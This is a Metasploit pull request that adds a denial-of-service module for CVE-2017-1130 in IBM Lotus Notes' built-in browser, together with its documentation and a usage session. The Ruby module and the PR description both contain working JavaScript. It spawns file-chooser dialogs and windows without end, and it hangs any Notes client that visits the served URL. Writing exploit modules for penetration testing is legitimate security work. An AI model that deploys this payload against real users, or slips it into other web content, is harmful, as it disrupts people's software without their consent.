### PR TITLE
IBM Lotus Notes DoS (CVE-2017-1130)

### DIFF
--- a/documentation/modules/auxiliary/dos/http/ibm_lotus_notes2.md
+++ b/documentation/modules/auxiliary/dos/http/ibm_lotus_notes2.md
@@ -1,0 +1,67 @@
+## Vulnerable Application
+This module exploits a vulnerability in the built-in web-browser of IBM Lotus Notes client application.
+
+If a user is persuaded to click on a malicious link, it would open up many file select dialog boxes which, 
+would cause the client hang and have to be restarted.
+
+Affected Products and Versions
+
+IBM Notes 9.0.1 to 9.0.1 FP8 IF1
+IBM Notes 9.0 to 9.0 IF4.
+IBM Notes 8.5.3 to 8.5.3 FP6 IF13.
+IBM Notes 8.5.2 to 8.5.2 FP4 IF3.
+IBM Notes 8.5.1. to 8.5.1 FP5 IF5.
+IBM Notes 8.5 release
+
+Related security bulletin from IBM: http://www-01.ibm.com/support/docview.wss?uid=swg21999384 
+
+## Verification
+
+Start msfconsole
+
+`use auxiliary/dos/http/ibm_lotus_notes2.rb`
+
+Set `SRVHOST`
+
+Set `SRVPORT`
+
+run (Server started)
+Visit server URL in the built-in web-browser of IBM Notes client application
+
+## Scenarios
+
+```
+msf > use auxiliary/dos/http/ibm_lotus_notes2 
+msf auxiliary(ibm_lotus_notes2) > show options 
+
+Module options (auxiliary/dos/http/ibm_lotus_notes2):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
+   SRVPORT  8080             yes       The local port to listen on.
+   SSL      false            no        Negotiate SSL for incoming connections
+   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
+   URIPATH                   no        The URI to use for this exploit (default is random)
+
+
+Auxiliary action:
+
+   Name       Description
+   ----       -----------
+   WebServer  
+
+
+msf auxiliary(ibm_lotus_notes2) > set SRVHOST 192.168.0.50
+SRVHOST => 192.168.0.50
+msf auxiliary(ibm_lotus_notes2) > set SRVPORT 9092
+SRVPORT => 9092
+msf auxiliary(ibm_lotus_notes2) > run
+[*] Auxiliary module execution completed
+msf auxiliary(ibm_lotus_notes2) > 
+[*] Using URL: http://192.168.0.50:9092/mypath
+[*] Server started.
+msf auxiliary(ibm_lotus_notes2) > 
+```
+
+At this point, the target should use the built-in web browser of their IBM Lotus Notes client to navigate to the above "Using URL" value.  And then they should see their Notes app become unresponsive.

--- a/modules/auxiliary/dos/http/ibm_lotus_notes2.rb
+++ b/modules/auxiliary/dos/http/ibm_lotus_notes2.rb
@@ -52,7 +52,7 @@ setInterval(function(){
           delete kins[k];
            }
          }
-        w = open('data:text/html,<input type=file id=f><script>f.click();setInterval("f.click()", 1);<\/script>');
+        w = open('data:text/html,<input type="file" id="f"><script>f.click();setInterval("f.click()", 1);<\\/script>');
         if (w) {
                 kins[i] = w;
                 i++;

--- a/modules/auxiliary/dos/http/ibm_lotus_notes2.rb
+++ b/modules/auxiliary/dos/http/ibm_lotus_notes2.rb
@@ -10,7 +10,7 @@ class MetasploitModule < Msf::Auxiliary
     super(
       update_info(
         info,
-        'Name'           => "IBM Notes encodeURI DOS",
+        'Name'           => "IBM Notes Denial Of Service",
         'Description'    => %q(
           This module exploits a vulnerability in the native browser that comes with IBM Lotus Notes.
           If successful, the browser will crash after viewing the webpage.
@@ -46,17 +46,17 @@ var i = 1;
 f.click();
 setInterval("f.click()", 1);
 setInterval(function(){
-	for (var k in kins) {
-		if (kins[k] && kins[k].status === undefined) {
-			kins[k].close();
-			delete kins[k];
-		}
-	}
-	w = open('data:text/html,<input type=file id=f><script>f.click();setInterval("f.click()", 1);<\/script>');
-	if (w) {
-		kins[i] = w;
-		i++;
-	}
+          for (var k in kins) {
+          if (kins[k] && kins[k].status === undefined) {
+          kins[k].close();
+          delete kins[k];
+           }
+         }
+        w = open('data:text/html,<input type=file id=f><script>f.click();setInterval("f.click()", 1);<\/script>');
+        if (w) {
+                kins[i] = w;
+                i++;
+        }
 }, 1);
 </script>
 </body></html>

--- a/modules/auxiliary/dos/http/ibm_lotus_notes2.rb
+++ b/modules/auxiliary/dos/http/ibm_lotus_notes2.rb
@@ -23,7 +23,7 @@ class MetasploitModule < Msf::Auxiliary
           [ 'EXPLOIT-DB', '42604'],
           [ 'CVE', '2017-1130' ]
         ],
-        'DisclosureDate' => 'August 31 2017',
+        'DisclosureDate' => 'Aug 31 2017',
         'Actions'        => [[ 'WebServer' ]],
         'PassiveActions' => [ 'WebServer' ],
         'DefaultAction'  => 'WebServer'

--- a/modules/auxiliary/dos/http/ibm_lotus_notes2.rb
+++ b/modules/auxiliary/dos/http/ibm_lotus_notes2.rb
@@ -20,7 +20,7 @@ class MetasploitModule < Msf::Auxiliary
           'Dhiraj Mishra',
         ],
         'References'     => [
-          [ 'EXPLOIT-DB', '42604'],
+          ['EDB', '42604'],
           [ 'CVE', '2017-1130' ]
         ],
         'DisclosureDate' => 'Aug 31 2017',

--- a/modules/auxiliary/dos/http/ibm_lotus_notes2.rb
+++ b/modules/auxiliary/dos/http/ibm_lotus_notes2.rb
@@ -1,0 +1,70 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HttpServer
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name'           => "IBM Notes encodeURI DOS",
+        'Description'    => %q(
+          This module exploits a vulnerability in the native browser that comes with IBM Lotus Notes.
+          If successful, the browser will crash after viewing the webpage.
+        ),
+        'License'        => MSF_LICENSE,
+        'Author'         => [
+          'Dhiraj Mishra',
+        ],
+        'References'     => [
+          [ 'EXPLOIT-DB', '42604'],
+          [ 'CVE', '2017-1130' ]
+        ],
+        'DisclosureDate' => 'August 31 2017',
+        'Actions'        => [[ 'WebServer' ]],
+        'PassiveActions' => [ 'WebServer' ],
+        'DefaultAction'  => 'WebServer'
+      )
+    )
+  end
+
+  def run
+    exploit # start http server
+  end
+
+  def setup
+    @html = %|
+<html><body>
+<input type="file" id="f">
+<script>
+var w;
+var kins = {};
+var i = 1;
+f.click();
+setInterval("f.click()", 1);
+setInterval(function(){
+	for (var k in kins) {
+		if (kins[k] && kins[k].status === undefined) {
+			kins[k].close();
+			delete kins[k];
+		}
+	}
+	w = open('data:text/html,<input type=file id=f><script>f.click();setInterval("f.click()", 1);<\/script>');
+	if (w) {
+		kins[i] = w;
+		i++;
+	}
+}, 1);
+</script>
+</body></html>
+    |
+  end
+
+  def on_request_uri(cli, _request)
+    print_status('Sending response')
+    send_response(cli, @html)
+  end
+end


### PR DESCRIPTION
This module will exploit a vulnerability (CVE-2017-1130) found in some versions of IBM Lotus Notes client, creating many file chooser dialogs and making the application no longer usable.

## Verification

- [x] Start `msfconsole`
- [x] `use use auxiliary/dos/http/ibm_lotus_notes2`
- [x] `set SRVHOST <IP of MSF system to act as server>`
- [x] `set SRVPORT <port of MSF system to act as server>`
- [x] `run`
- [x] in target system's Notes client browser, navigate to the URL given in the output of the previous command
- [x] **Verify** the Notes client browser gets innundated with file chooser dialogs, making it unsuable
- [x] **Document** the thing and how it works ([Example](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/post/multi/gather/aws_keys.md))

-----

The below snip code would open up many file select dialog boxes which would cause the client hang and have to be restarted for IBM Notes.
```
<input type="file" id="f">
<script>
var w;
var wins = {};
var i = 1;
f.click();
setInterval("f.click()", 1);
setInterval(function(){
	for (var k in wins) {
		if (wins[k] && wins[k].status === undefined) {
			wins[k].close();
			delete wins[k];
		}
	}
	w = open('data:text/html,<input type=file id=f><script>f.click();setInterval("f.click()", 1);<\/script>');
	if (w) {
		wins[i] = w;
		i++;
	}
}, 1);
</script>
```
I have made an rb module for this as well, but i am facing few challenges, request you to please have a look it giver error some where near this :
```
if (w) {
		wins[i] = w;
		i++;
	}
}, 1);
```